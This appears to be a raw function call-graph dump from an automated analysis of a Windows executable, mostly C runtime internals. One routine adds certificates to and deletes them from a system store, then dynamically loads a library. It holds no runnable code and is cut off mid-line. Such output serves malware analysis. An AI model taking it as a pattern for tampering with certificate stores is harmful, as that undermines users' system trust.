6204->6160 6205->6197 6207 9b8fc8 6206->6207 6208 9b8fb3 6206->6208 6213 9b8fc3 6207->6213 6225 9b7f05 6207->6225 6209 9b47f9 __dosmaperr 15 API calls 6208->6209 6210 9b8fb8 6209->6210 6212 9b473d _abort 21 API calls 6210->6212 6212->6213 6213->6200 6215 9b828e 15 API calls 6216 9b8fe4 6215->6216 6231 9b732b 6216->6231 6218 9b8fea 6238 9b9d4e 6218->6238 6221 9b4869 _free 15 API calls 6221->6213 6459 9b7479 LeaveCriticalSection 6222->6459 6224 9b909a 6224->6198 6226 9b7f1d 6225->6226 6230 9b7f19 6225->6230 6227 9b732b 21 API calls 6226->6227 6226->6230 6228 9b7f3d 6227->6228 6253 9b89a7 6228->6253 6230->6215 6232 9b734c 6231->6232 6233 9b7337 6231->6233 6232->6218 6234 9b47f9 __dosmaperr 15 API calls 6233->6234 6235 9b733c 6234->6235 6236 9b473d _abort 21 API calls 6235->6236 6237 9b7347 6236->6237 6237->6218 6239 9b9d5d 6238->6239 6242 9b9d72 6238->6242 6240 9b47e6 __dosmaperr 15 API calls 6239->6240 6244 9b9d62 6240->6244 6241 9b9dad 6243 9b47e6 __dosmaperr 15 API calls 6241->6243 6242->6241 6245 9b9d99 6242->6245 6246 9b9db2 6243->6246 6247 9b47f9 __dosmaperr 15 API calls 6244->6247 6416 9b9d26 6245->6416 6249 9b47f9 __dosmaperr 15 API calls 6246->6249 6250 9b8ff0 6247->6250 6251 9b9dba 6249->6251 6250->6213 6250->6221 6252 9b473d _abort 21 API calls 6251->6252 6252->6250 6254 9b89b3 ___scrt_is_nonwritable_in_current_image 6253->6254 6255 9b89bb 6254->6255 6256 9b89d3 6254->6256 6278 9b47e6 6255->6278 6257 9b8a71 6256->6257 6261 9b8a08 6256->6261 6259 9b47e6 __dosmaperr 15 API calls 6257->6259 6262 9b8a76 6259->6262 6281 9b5d23 EnterCriticalSection 6261->6281 6265 9b47f9 __dosmaperr 15 API calls 6262->6265 6263 9b47f9 __dosmaperr 15 API calls 6266 9b89c8 _abort 6263->6266 6268 9b8a7e 6265->6268 6266->6230 6267 9b8a0e 6269 9b8a2a 6267->6269 6270 9b8a3f 6267->6270 6271 9b473d _abort 21 API calls 6268->6271 6272 9b47f9 __dosmaperr 15 API calls 6269->6272 6282 9b8a92 6270->6282 6271->6266 6274 9b8a2f 6272->6274 6276 9b47e6 __dosmaperr 15 API calls 6274->6276 6275 9b8a3a 6331 9b8a69 6275->6331 6276->6275 6279 9b44a8 __dosmaperr 15 API calls 6278->6279 6280 9b47eb 6279->6280 6280->6263 6281->6267 6283 9b8ac0 6282->6283 6290 9b8ab9 _ValidateLocalCookies 6282->6290 6284 9b8ae3 6283->6284 6285 9b8ac4 6283->6285 6288 9b8b34 6284->6288 6289 9b8b17 6284->6289 6286 9b47e6 __dosmaperr 15 API calls 6285->6286 6287 9b8ac9 6286->6287 6291 9b47f9 __dosmaperr 15 API calls 6287->6291 6292 9b8b4a 6288->6292 6334 9b8f8b 6288->6334 6293 9b47e6 __dosmaperr 15 API calls 6289->6293 6290->6275 6294 9b8ad0 6291->6294 6337 9b8637 6292->6337 6297 9b8b1c 6293->6297 6298 9b473d _abort 21 API calls 6294->6298 6300 9b47f9 __dosmaperr 15 API calls 6297->6300 6298->6290 6303 9b8b24 6300->6303 6301 9b8b58 6307 9b8b7e 6301->6307 6308 9b8b5c 6301->6308 6302 9b8b91 6305 9b8beb WriteFile 6302->6305 6306 9b8ba5 6302->6306 6304 9b473d _abort 21 API calls 6303->6304 6304->6290 6309 9b8c0e GetLastError 6305->6309 6320 9b8b74 6305->6320 6311 9b8bdb 6306->6311 6312 9b8bad 6306->6312 6349 9b8417 GetConsoleCP 6307->6349 6313 9b8c52 6308->6313 6344 9b85ca 6308->6344 6309->6320 6369 9b86ad 6311->6369 6314 9b8bcb 6312->6314 6315 9b8bb2 6312->6315 6313->6290 6318 9b47f9 __dosmaperr 15 API calls 6313->6318 6363 9b887a 6314->6363 6315->6313 6358 9b878c 6315->6358 6321 9b8c77 6318->6321 6320->6290 6320->6313 6322 9b8c2e 6320->6322 6324 9b47e6 __dosmaperr 15 API calls 6321->6324 6325 9b8c49 6322->6325 6326 9b8c35 6322->6326 6324->6290 6374 9b47c3 6325->6374 6327 9b47f9 __dosmaperr 15 API calls 6326->6327 6329 9b8c3a 6327->6329 6330 9b47e6 __dosmaperr 15 API calls 6329->6330 6330->6290 6415 9b5d46 LeaveCriticalSection 6331->6415 6333 9b8a6f 6333->6266 6379 9b8f0d 6334->6379 6401 9b7eaf 6337->6401 6339 9b8647 6340 9b864c 6339->6340 6341 9b4424 _abort 33 API calls 6339->6341 6340->6301 6340->6302 6342 9b866f 6341->6342 6342->6340 6343 9b868d GetConsoleMode 6342->6343 6343->6340 6346 9b8624 6344->6346 6348 9b85ef 6344->6348 6345 9b8626 GetLastError 6345->6346 6346->6320 6347 9b9101 WriteConsoleW CreateFileW 6347->6348 6348->6345 6348->6346 6348->6347 6350 9b858c _ValidateLocalCookies 6349->6350 6353 9b847a 6349->6353 6350->6320 6352 9b72b7 35 API calls __fassign 6352->6353 6353->6350 6353->6352 6354 9b8500 WideCharToMultiByte 6353->6354 6357 9b8557 WriteFile 6353->6357 6410 9b6052 6353->6410 6354->6350 6355 9b8526 WriteFile 6354->6355 6355->6353 6356 9b85af GetLastError 6355->6356 6356->6350 6357->6353 6357->6356 6361 9b879b 6358->6361 6359 9b8819 WriteFile 6360 9b885f GetLastError 6359->6360 6359->6361 6362 9b885d _ValidateLocalCookies 6360->6362 6361->6359 6361->6362 6362->6320 6365 9b8889 6363->6365 6364 9b8994 _ValidateLocalCookies 6364->6320 6365->6364 6366 9b890b WideCharToMultiByte 6365->6366 6368 9b8940 WriteFile 6365->6368 6367 9b898c GetLastError 6366->6367 6366->6368 6367->6364 6368->6365 6368->6367 6372 9b86bc 6369->6372 6370 9b872e WriteFile 6370->6372 6373 9b8771 GetLastError 6370->6373 6371 9b876f _ValidateLocalCookies 6371->6320 6372->6370 6372->6371 6373->6371 6375 9b47e6 __dosmaperr 15 API calls 6374->6375 6376 9b47ce __dosmaperr 6375->6376 6377 9b47f9 __dosmaperr 15 API calls 6376->6377 6378 9b47e1 6377->6378 6378->6290 6388 9b5dfa 6379->6388 6381 9b8f1f 6382 9b8f38 SetFilePointerEx 6381->6382 6383 9b8f27 6381->6383 6385 9b8f2c 6382->6385 6386 9b8f50 GetLastError 6382->6386 6384 9b47f9 __dosmaperr 15 API calls 6383->6384 6384->6385 6385->6292 6387 9b47c3 __dosmaperr 15 API calls 6386->6387 6387->6385 6389 9b5e1c 6388->6389 6390 9b5e07 6388->6390 6393 9b47e6 __dosmaperr 15 API calls 6389->6393 6395 9b5e41 6389->6395 6391 9b47e6 __dosmaperr 15 API calls 6390->6391 6392 9b5e0c 6391->6392 6394 9b47f9 __dosmaperr 15 API calls 6392->6394 6396 9b5e4c 6393->6396 6398 9b5e14 6394->6398 6395->6381 6397 9b47f9 __dosmaperr 15 API calls 6396->6397 6399 9b5e54 6397->6399 6398->6381 6400 9b473d _abort 21 API calls 6399->6400 6400->6398 6402 9b7ec9 6401->6402 6403 9b7ebc 6401->6403 6406 9b7ed5 6402->6406 6407 9b47f9 __dosmaperr 15 API calls 6402->6407 6404 9b47f9 __dosmaperr 15 API calls 6403->6404 6405 9b7ec1 6404->6405 6405->6339 6406->6339 6408 9b7ef6 6407->6408 6409 9b473d _abort 21 API calls 6408->6409 6409->6405 6411 9b4424 _abort 33 API calls 6410->6411 6412 9b605d 6411->6412 6413 9b72d1 __fassign 33 API calls 6412->6413 6414 9b606d 6413->6414 6414->6353 6415->6333 6419 9b9ca4 6416->6419 6418 9b9d4a 6418->6250 6420 9b9cb0 ___scrt_is_nonwritable_in_current_image 6419->6420 6430 9b5d23 EnterCriticalSection 6420->6430 6422 9b9cbe 6423 9b9cf0 6422->6423 6424 9b9ce5 6422->6424 6426 9b47f9 __dosmaperr 15 API calls 6423->6426 6431 9b9dcd 6424->6431 6427 9b9ceb 6426->6427 6446 9b9d1a 6427->6446 6429 9b9d0d _abort 6429->6418 6430->6422 6432 9b5dfa 21 API calls 6431->6432 6435 9b9ddd 6432->6435 6433 9b9de3 6449 9b5d69 6433->6449 6435->6433 6438 9b5dfa 21 API calls 6435->6438 6445 9b9e15 6435->6445 6436 9b5dfa 21 API calls 6439 9b9e21 CloseHandle 6436->6439 6440 9b9e0c 6438->6440 6439->6433 6442 9b9e2d GetLastError 6439->6442 6441 9b5dfa 21 API calls 6440->6441 6441->6445 6442->6433 6443 9b47c3 __dosmaperr 15 API calls 6444 9b9e5d 6443->6444 6444->6427 6445->6433 6445->6436 6458 9b5d46 LeaveCriticalSection 6446->6458 6448 9b9d24 6448->6429 6450 9b5d78 6449->6450 6451 9b5ddf 6449->6451 6450->6451 6456 9b5da2 6450->6456 6452 9b47f9 __dosmaperr 15 API calls 6451->6452 6453 9b5de4 6452->6453 6454 9b47e6 __dosmaperr 15 API calls 6453->6454 6455 9b5dcf 6454->6455 6455->6443 6455->6444 6456->6455 6457 9b5dc9 SetStdHandle 6456->6457 6457->6455 6458->6448 6459->6224 6460->6204 6605 9b365d 6606 9b3e89 33 API calls 6605->6606 6607 9b3665 6606->6607 6461 9b7d1c 6462 9b522b 46 API calls 6461->6462 6463 9b7d21 6462->6463 5763 9b6893 GetProcessHeap 6608 9b2f53 6609 9b2f7e 6608->6609 6610 9b2f62 6608->6610 6612 9b522b 46 API calls 6609->6612 6610->6609 6611 9b2f68 6610->6611 6613 9b47f9 __dosmaperr 15 API calls 6611->6613 6614 9b2f85 GetModuleFileNameA 6612->6614 6616 9b2f6d 6613->6616 6615 9b2fa9 6614->6615 6631 9b3077 6615->6631 6617 9b473d _abort 21 API calls 6616->6617 6619 9b2f77 6617->6619 6621 9b31ec 15 API calls 6622 9b2fd3 6621->6622 6623 9b2fe8 6622->6623 6624 9b2fdc 6622->6624 6626 9b3077 33 API calls 6623->6626 6625 9b47f9 __dosmaperr 15 API calls 6624->6625 6627 9b2fe1 6625->6627 6629 9b2ffe 6626->6629 6628 9b4869 _free 15 API calls 6627->6628 6628->6619 6629->6627 6630 9b4869 _free 15 API calls 6629->6630 6630->6627 6633 9b309c 6631->6633 6632 9b55b6 33 API calls 6632->6633 6633->6632 6635 9b30fc 6633->6635 6634 9b2fc6 6634->6621 6635->6634 6636 9b55b6 33 API calls 6635->6636 6636->6635 6637 9b7351 6638 9b735e 6637->6638 6639 9b480c _abort 15 API calls 6638->6639 6640 9b7378 6639->6640 6641 9b4869 _free 15 API calls 6640->6641 6642 9b7384 6641->6642 6643 9b480c _abort 15 API calls 6642->6643 6646 9b73aa 6642->6646 6644 9b739e 6643->6644 6647 9b4869 _free 15 API calls 6644->6647 6645 9b59b3 6 API calls 6645->6646 6646->6645 6648 9b73b6 6646->6648 6647->6646 5962 9b5fd0 5963 9b5fdc ___scrt_is_nonwritable_in_current_image 5962->5963 5974 9b56e2 EnterCriticalSection 5963->5974 5965 9b5fe3 5975 9b5c8b 5965->5975 5967 9b5ff2 5972 9b6001 5967->5972 5988 9b5e64 GetStartupInfoW 5967->5988 5999 9b601d 5972->5999 5973 9b6012 _abort 5974->5965 5976 9b5c97 ___scrt_is_nonwritable_in_current_image 5975->5976 5977 9b5cbb 5976->5977 5978 9b5ca4 5976->5978 6002 9b56e2 EnterCriticalSection 5977->6002 5980 9b47f9 __dosmaperr 15 API calls 5978->5980 5981 9b5ca9 5980->5981 5982 9b473d _abort 21 API calls 5981->5982 5983 9b5cb3 _abort 5982->5983 5983->5967 5984 9b5cf3 6010 9b5d1a 5984->6010 5985 9b5cc7 5985->5984 6003 9b5bdc 5985->6003 5989 9b5e81 5988->5989 5990 9b5f13 5988->5990 5989->5990 5991 9b5c8b 22 API calls 5989->5991 5994 9b5f1a 5990->5994 5992 9b5eaa 5991->5992 5992->5990 5993 9b5ed8 GetFileType 5992->5993 5993->5992 5995 9b5f21 5994->5995 5996 9b5f64 GetStdHandle 5995->5996 5997 9b5fcc 5995->5997 5998 9b5f77 GetFileType 5995->5998 5996->5995 5997->5972 5998->5995 6014 9b572a LeaveCriticalSection 5999->6014 6001 9b6024 6001->5973 6002->5985 6004 9b480c _abort 15 API calls 6003->6004 6009 9b5bee 6004->6009 6005 9b5bfb 6006 9b4869 _free 15 API calls 6005->6006 6007 9b5c4d 6006->6007 6007->5985 6008 9b59b3 6 API calls 6008->6009 6009->6005 6009->6008 6013 9b572a LeaveCriticalSection 6010->6013 6012 9b5d21 6012->5983 6013->6012 6014->6001 6464 9b7a10 6467 9b7a27 6464->6467 6468 9b7a49 6467->6468 6469 9b7a35 6467->6469 6471 9b7a63 6468->6471 6472 9b7a51 6468->6472 6470 9b47f9 __dosmaperr 15 API calls 6469->6470 6473 9b7a3a 6470->6473 6477 9b3f72 __fassign 33 API calls 6471->6477 6479 9b7a22 6471->6479 6474 9b47f9 __dosmaperr 15 API calls 6472->6474 6475 9b473d _abort 21 API calls 6473->6475 6476 9b7a56 6474->6476 6475->6479 6478 9b473d _abort 21 API calls 6476->6478 6477->6479 6478->6479 5764 9b4c8a 5769 9b4cbf 5764->5769 5767 9b4869 _free 15 API calls 5768 9b4ca6 5767->5768 5770 9b4cd1 5769->5770 5778 9b4c98 5769->5778 5771 9b4d01 5770->5771 5772 9b4cd6 5770->5772 5771->5778 5780 9b681b 5771->5780 5773 9b480c _abort 15 API calls 5772->5773 5775 9b4cdf 5773->5775 5777 9b4869 _free 15 API calls 5775->5777 5776 9b4d1c 5779 9b4869 _free 15 API calls 5776->5779 5777->5778 5778->5767 5778->5768 5779->5778 5781 9b6826 5780->5781 5782 9b684e 5781->5782 5784 9b683f 5781->5784 5783 9b685d 5782->5783 5789 9b7e13 5782->5789 5796 9b7e46 5783->5796 5786 9b47f9 __dosmaperr 15 API calls 5784->5786 5788 9b6844 _abort 5786->5788 5788->5776 5790 9b7e1e 5789->5790 5791 9b7e33 HeapSize 5789->5791 5792 9b47f9 __dosmaperr 15 API calls 5790->5792 5791->5783 5793 9b7e23 5792->5793 5794 9b473d _abort 21 API calls 5793->5794 5795 9b7e2e 5794->5795 5795->5783 5797 9b7e5e 5796->5797 5798 9b7e53 5796->5798 5800 9b7e66 5797->5800 5806 9b7e6f _abort 5797->5806 5799 9b62ff 16 API calls 5798->5799 5804 9b7e5b 5799->5804 5801 9b4869 _free 15 API calls 5800->5801 5801->5804 5802 9b7e99 HeapReAlloc 5802->5804 5802->5806 5803 9b7e74 5805 9b47f9 __dosmaperr 15 API calls 5803->5805 5804->5788 5805->5804 5806->5802 5806->5803 5807 9b6992 _abort 2 API calls 5806->5807 5807->5806 5808 9b1489 5811 9b1853 5808->5811 5810 9b148e 5810->5810 5812 9b1869 5811->5812 5814 9b1872 5812->5814 5815 9b1806 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 5812->5815 5814->5810 5815->5814 6649 9b1248 6650 9b1250 6649->6650 6666 9b37f7 6650->6666 6652 9b125b 6673 9b1664 6652->6673 6654 9b191f 4 API calls 6656 9b12f2 6654->6656 6655 9b1270 __RTC_Initialize 6664 9b12cd 6655->6664 6679 9b17f1 6655->6679 6658 9b1289 6658->6664 6682 9b18ab InitializeSListHead 6658->6682 6660 9b129f 6683 9b18ba 6660->6683 6662 9b12c2 6689 9b3891 6662->6689 6664->6654 6665 9b12ea 6664->6665 6667 9b3829 6666->6667 6668 9b3806 6666->6668 6667->6652 6668->6667 6669 9b47f9 __dosmaperr 15 API calls 6668->6669 6670 9b3819 6669->6670 6671 9b473d _abort 21 API calls 6670->6671 6672 9b3824 6671->6672 6672->6652 6674 9b1670 6673->6674 6675 9b1674 6673->6675 6674->6655 6676 9b1681 ___scrt_release_startup_lock 6675->6676 6677 9b191f 4 API calls 6675->6677 6676->6655 6678 9b16ea 6677->6678 6696 9b17c4 6679->6696 6682->6660 6734 9b3e2a 6683->6734 6685 9b18cb 6686 9b18d2 6685->6686 6687 9b191f 4 API calls 6685->6687 6686->6662 6688 9b18da 6687->6688 6688->6662 6690 9b4424 _abort 33 API calls 6689->6690 6691 9b389c 6690->6691 6692 9b38d4 6691->6692 6693 9b47f9 __dosmaperr 15 API calls 6691->6693 6692->6664 6694 9b38c9 6693->6694 6695 9b473d _abort 21 API calls 6694->6695 6695->6692 6697 9b17da 6696->6697 6698 9b17d3 6696->6698 6705 9b3cf1 6697->6705 6702 9b3c81 6698->6702 6701 9b17d8 6701->6658 6703 9b3cf1 24 API calls 6702->6703 6704 9b3c93 6703->6704 6704->6701 6708 9b39f8 6705->6708 6711 9b392e 6708->6711 6710 9b3a1c 6710->6701 6712 9b393a ___scrt_is_nonwritable_in_current_image 6711->6712 6719 9b56e2 EnterCriticalSection 6712->6719 6714 9b3948 6720 9b3b40 6714->6720 6716 9b3955 6730 9b3973 6716->6730 6718 9b3966 _abort 6718->6710 6719->6714 6721 9b3b56 _abort 6720->6721 6722 9b3b5e 6720->6722 6721->6716 6722->6721 6723 9b681b 24 API calls 6722->6723 6729 9b3bb7 6722->6729 6725 9b3bad 6723->6725 6724 9b681b 24 API calls 6726 9b3bcd 6724->6726 6727 9b4869 _free 15 API calls 6725->6727 6728 9b4869 _free 15 API calls 6726->6728 6727->6729 6728->6721 6729->6721 6729->6724 6733 9b572a LeaveCriticalSection 6730->6733 6732 9b397d 6732->6718 6733->6732 6735 9b3e48 6734->6735 6739 9b3e68 6734->6739 6736 9b47f9 __dosmaperr 15 API calls 6735->6736 6737 9b3e5e 6736->6737 6738 9b473d _abort 21 API calls 6737->6738 6738->6739 6739->6685 5816 9b3d8f 5817 9b3d9e 5816->5817 5821 9b3db2 5816->5821 5819 9b4869 _free 15 API calls 5817->5819 5817->5821 5818 9b4869 _free 15 API calls 5820 9b3dc4 5818->5820 5819->5821 5822 9b4869 _free 15 API calls 5820->5822 5821->5818 5823 9b3dd7 5822->5823 5824 9b4869 _free 15 API calls 5823->5824 5825 9b3de8 5824->5825 5826 9b4869 _free 15 API calls 5825->5826 5827 9b3df9 5826->5827 6480 9b430f 6481 9b431a 6480->6481 6482 9b432a 6480->6482 6486 9b4330 6481->6486 6485 9b4869 _free 15 API calls 6485->6482 6487 9b4349 6486->6487 6488 9b4343 6486->6488 6489 9b4869 _free 15 API calls 6487->6489 6490 9b4869 _free 15 API calls 6488->6490 6491 9b4355 6489->6491 6490->6487 6492 9b4869 _free 15 API calls 6491->6492 6493 9b4360 6492->6493 6494 9b4869 _free 15 API calls 6493->6494 6495 9b436b 6494->6495 6496 9b4869 _free 15 API calls 6495->6496 6497 9b4376 6496->6497 6498 9b4869 _free 15 API calls 6497->6498 6499 9b4381 6498->6499 6500 9b4869 _free 15 API calls 6499->6500 6501 9b438c 6500->6501 6502 9b4869 _free 15 API calls 6501->6502 6503 9b4397 6502->6503 6504 9b4869 _free 15 API calls 6503->6504 6505 9b43a2 6504->6505 6506 9b4869 _free 15 API calls 6505->6506 6507 9b43b0 6506->6507 6512 9b41f6 6507->6512 6518 9b4102 6512->6518 6514 9b421a 6515 9b4246 6514->6515 6531 9b4163 6515->6531 6517 9b426a 6517->6485 6519 9b410e ___scrt_is_nonwritable_in_current_image 6518->6519 6526 9b56e2 EnterCriticalSection 6519->6526 6522 9b4118 6524 9b4869 _free 15 API calls 6522->6524 6525 9b4142 6522->6525 6523 9b414f _abort 6523->6514 6524->6525 6527 9b4157 6525->6527 6526->6522 6530 9b572a LeaveCriticalSection 6527->6530 6529 9b4161 6529->6523 6530->6529 6532 9b416f ___scrt_is_nonwritable_in_current_image 6531->6532 6539 9b56e2 EnterCriticalSection 6532->6539 6534 9b4179 6535 9b43d9 _abort 15 API calls 6534->6535 6536 9b418c 6535->6536 6540 9b41a2 6536->6540 6538 9b419a _abort 6538->6517 6539->6534 6543 9b572a LeaveCriticalSection 6540->6543 6542 9b41ac 6542->6538 6543->6542 6015 9b55ce GetCommandLineA GetCommandLineW 5032 9b130d 5033 9b1319 ___scrt_is_nonwritable_in_current_image 5032->5033 5059 9b162b 5033->5059 5035 9b1320 5036 9b1473 5035->5036 5047 9b134a ___scrt_is_nonwritable_in_current_image _abort ___scrt_release_startup_lock 5035->5047 5114 9b191f IsProcessorFeaturePresent 5036->5114 5038 9b147a 5039 9b1480 5038->5039 5096 9b37e1 5038->5096 5118 9b3793 5039->5118 5043 9b13ea 5067 9b1a34 5043->5067 5047->5043 5058 9b1369 5047->5058 5099 9b37a9 5047->5099 5051 9b1405 5105 9b1a6a GetModuleHandleW 5051->5105 5054 9b1410 5055 9b1419 5054->5055 5107 9b3784 5054->5107 5110 9b179c 5055->5110 5060 9b1634 5059->5060 5121 9b1bd4 IsProcessorFeaturePresent 5060->5121 5064 9b1645 5065 9b1649 5064->5065 5131 9b1f7d 5064->5131 5065->5035 5191 9b20b0 5067->5191 5069 9b1a47 GetStartupInfoW 5070 9b13f0 5069->5070 5071 9b3457 5070->5071 5193 9b522b 5071->5193 5073 9b3460 5074 9b13f8 5073->5074 5197 9b55b6 5073->5197 5076 9b1000 6 API calls 5074->5076 5077 9b11e3 Sleep 5076->5077 5078 9b1096 CryptMsgGetParam 5076->5078 5079 9b1215 CertCloseStore LocalFree LocalFree LocalFree 5077->5079 5087 9b11f7 5077->5087 5080 9b10bc LocalAlloc 5078->5080 5081 9b1162 CryptMsgGetParam 5078->5081 5079->5051 5083 9b10d7 5080->5083 5084 9b1156 LocalFree 5080->5084 5081->5077 5082 9b1174 CryptMsgGetParam 5081->5082 5082->5077 5085 9b1188 CertFindAttribute CertFindAttribute 5082->5085 5088 9b10e0 LocalAlloc CryptMsgGetParam 5083->5088 5084->5081 5089 9b11b1 5085->5089 5090 9b11b5 LoadLibraryA GetProcAddress 5085->5090 5086 9b120a CertDeleteCertificateFromStore 5086->5087 5087->5079 5087->5086 5091 9b113d LocalFree 5088->5091 5092 9b1114 CertCreateCertificateContext 5088->5092 5089->5077 5089->5090 5090->5077 5091->5088 5093 9b114d 5091->5093 5094 9b1133 CertFreeCertificateContext 5092->5094 5095 9b1126 CertAddCertificateContextToStore 5092->5095 5093->5084 5094->5091 5095->5094 5685 9b355e 5096->5685 5098 9b37f2 5098->5039 5100 9b37d1 _abort 5099->5100 5100->5043 5101 9b4424 _abort 33 API calls 5100->5101 5104 9b3e9a 5101->5104 5102 9b3f24 _abort 33 API calls 5103 9b3ec4 5102->5103 5104->5102 5106 9b140c 5105->5106 5106->5038 5106->5054 5108 9b355e _abort 23 API calls 5107->5108 5109 9b378f 5108->5109 5109->5055 5112 9b17a8 ___scrt_uninitialize_crt 5110->5112 5111 9b17be 5111->5058 5112->5111 5113 9b1f7d ___scrt_uninitialize_crt 7 API calls 5112->5113 5113->5111 5115 9b1935 _abort 5114->5115 5116 9b19e0 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 5115->5116 5117 9b1a24 _abort 5116->5117 5117->5038 5119 9b355e _abort 23 API calls 5118->5119 5120 9b1488 5119->5120 5122 9b1640 5121->5122 5123 9b1f5e 5122->5123 5137 9b24b1 5123->5137 5126 9b1f67 5126->5064 5128 9b1f6f 5129 9b1f7a 5128->5129 5151 9b24ed 5128->5151 5129->5064 5132 9b1f90 5131->5132 5133 9b1f86 5131->5133 5132->5065 5134 9b2496 ___vcrt_uninitialize_ptd 6 API calls 5133->5134 5135 9b1f8b 5134->5135 5136 9b24ed ___vcrt_uninitialize_locks DeleteCriticalSection 5135->5136 5136->5132 5139 9b24ba 5137->5139 5140 9b24e3 5139->5140 5141 9b1f63 5139->5141 5155 9b271d 5139->5155 5142 9b24ed ___vcrt_uninitialize_locks DeleteCriticalSection 5140->5142 5141->5126 5143 9b2463 5141->5143 5142->5141 5172 9b262e 5143->5172 5148 9b2493 5148->5128 5150 9b2478 5150->5128 5152 9b2517 5151->5152 5153 9b24f8 5151->5153 5152->5126 5154 9b2502 DeleteCriticalSection 5153->5154 5154->5152 5154->5154 5160 9b2543 5155->5160 5158 9b2755 InitializeCriticalSectionAndSpinCount 5159 9b2740 5158->5159 5159->5139 5161 9b2560 5160->5161 5162 9b2564 5160->5162 5161->5158 5161->5159 5162->5161 5163 9b25cc GetProcAddress 5162->5163 5165 9b25bd 5162->5165 5167 9b25e3 LoadLibraryExW 5162->5167 5163->5161 5165->5163 5166 9b25c5 FreeLibrary 5165->5166 5166->5163 5168 9b25fa GetLastError 5167->5168 5169 9b262a 5167->5169 5168->5169 5170 9b2605 ___vcrt_FlsGetValue 5168->5170 5169->5162 5170->5169 5171 9b261b LoadLibraryExW 5170->5171 5171->5162 5173 9b2543 ___vcrt_FlsGetValue 5 API calls 5172->5173 5174 9b2648 5173->5174 5175 9b2661 TlsAlloc 5174->5175 5176 9b246d 5174->5176 5176->5150 5177 9b26df 5176->5177 5178 9b2543 ___vcrt_FlsGetValue 5 API calls 5177->5178 5179 9b26f9 5178->5179 5180 9b2714 TlsSetValue 5179->5180 5181 9b2486 5179->5181 5180->5181 5181->5148 5182 9b2496 5181->5182 5183 9b24a6 5182->5183 5184 9b24a0 5182->5184 5183->5150 5186 9b2669 5184->5186 5187 9b2543 ___vcrt_FlsGetValue 5 API calls 5186->5187 5188 9b2683 5187->5188 5189 9b269b TlsFree 5188->5189 5190 9b268f 5188->5190 5189->5190 5190->5183 5192 9b20c7 5191->5192 5192->5069 5192->5192 5194 9b5234 5193->5194 5196 9b523d 5193->5196 5200 9b512a 5194->5200 5196->5073 5682 9b555d 5197->5682 5220 9b4424 GetLastError 5200->5220 5202 9b5137 5240 9b5249 5202->5240 5204 9b513f 5249 9b4ebe 5204->5249 5207 9b5156 5207->5196 5209 9b5167 5210 9b5199 5209->5210 5263 9b52eb 5209->5263 5274 9b4869 5210->5274 5212 9b518c 5214 9b5194 5212->5214 5217 9b51b1 5212->5217 5271 9b47f9 5214->5271 5216 9b51dd 5216->5210 5280 9b4d94 5216->5280 5217->5216 5218 9b4869 _free 15 API calls 5217->5218 5218->5216 5221 9b443a 5220->5221 5222 9b4440 5220->5222 5283 9b5904 5221->5283 5226 9b448f SetLastError 5222->5226 5288 9b480c 5222->5288 5225 9b4452 5227 9b445a 5225->5227 5295 9b595a 5225->5295 5226->5202 5229 9b4869 _free 15 API calls 5227->5229 5231 9b4460 5229->5231 5230 9b446f 5230->5227 5232 9b4476 5230->5232 5234 9b449b SetLastError 5231->5234 5300 9b4296 5232->5300 5305 9b3f24 5234->5305 5237 9b4869 _free 15 API calls 5239 9b4488 5237->5239 5239->5226 5239->5234 5241 9b5255 ___scrt_is_nonwritable_in_current_image 5240->5241 5242 9b4424 _abort 33 API calls 5241->5242 5247 9b525f 5242->5247 5244 9b52e3 _abort 5244->5204 5245 9b3f24 _abort 33 API calls 5245->5247 5247->5244 5247->5245 5248 9b4869 _free 15 API calls 5247->5248 5541 9b56e2 EnterCriticalSection 5247->5541 5542 9b52da 5247->5542 5248->5247 5546 9b3f72 5249->5546 5252 9b4edf GetOEMCP 5254 9b4f08 5252->5254 5253 9b4ef1 5253->5254 5255 9b4ef6 GetACP 5253->5255 5254->5207 5256 9b62ff 5254->5256 5255->5254 5257 9b633d 5256->5257 5258 9b630d _abort 5256->5258 5259 9b47f9 __dosmaperr 15 API calls 5257->5259 5258->5257 5260 9b6328 HeapAlloc 5258->5260 5262 9b6992 _abort 2 API calls 5258->5262 5261 9b633b 5259->5261 5260->5258 5260->5261 5261->5209 5262->5258 5264 9b4ebe 35 API calls 5263->5264 5265 9b530a 5264->5265 5266 9b5311 _ValidateLocalCookies 5265->5266 5267 9b535b IsValidCodePage 5265->5267 5270 9b5380 _abort 5265->5270 5266->5212 5267->5266 5268 9b536d GetCPInfo 5267->5268 5268->5266 5268->5270 5583 9b4f96 GetCPInfo 5270->5583 5272 9b44a8 __dosmaperr 15 API calls 5271->5272 5273 9b47fe 5272->5273 5273->5210 5275 9b489d __dosmaperr 5274->5275 5276 9b4874 HeapFree 5274->5276 5275->5207 5276->5275 5277 9b4889 5276->5277 5278 9b47f9 __dosmaperr 13 API calls 5277->5278 5279 9b488f GetLastError 5278->5279 5279->5275 5646 9b4d51 5280->5646 5282 9b4db8 5282->5210 5316 9b5741 5283->5316 5285 9b592b 5286 9b5943 TlsGetValue 5285->5286 5287 9b5937 _ValidateLocalCookies 5285->5287 5286->5287 5287->5222 5289 9b4819 _abort 5288->5289 5290 9b4859 5289->5290 5291 9b4844 HeapAlloc 5289->5291 5329 9b6992 5289->5329 5293 9b47f9 __dosmaperr 14 API calls 5290->5293 5291->5289 5292 9b4857 5291->5292 5292->5225 5293->5292 5296 9b5741 _abort 5 API calls 5295->5296 5297 9b5981 5296->5297 5298 9b599c TlsSetValue 5297->5298 5299 9b5990 _ValidateLocalCookies 5297->5299 5298->5299 5299->5230 5343 9b426e 5300->5343 5451 9b6b14 5305->5451 5308 9b3f35 5309 9b3f3e IsProcessorFeaturePresent 5308->5309 5315 9b3f5c 5308->5315 5311 9b3f49 5309->5311 5479 9b4573 5311->5479 5312 9b3793 _abort 23 API calls 5314 9b3f66 5312->5314 5315->5312 5320 9b576d 5316->5320 5321 9b5771 _abort 5316->5321 5317 9b5791 5319 9b579d GetProcAddress 5317->5319 5317->5321 5319->5321 5320->5317 5320->5321 5322 9b57dd 5320->5322 5321->5285 5323 9b57fe LoadLibraryExW 5322->5323 5324 9b57f3 5322->5324 5325 9b581b GetLastError 5323->5325 5326 9b5833 5323->5326 5324->5320 5325->5326 5328 9b5826 LoadLibraryExW 5325->5328 5326->5324 5327 9b584a FreeLibrary 5326->5327 5327->5324 5328->5326 5332 9b69d6 5329->5332 5331 9b69a8 _ValidateLocalCookies 5331->5289 5333 9b69e2 ___scrt_is_nonwritable_in_current_image 5332->5333 5338 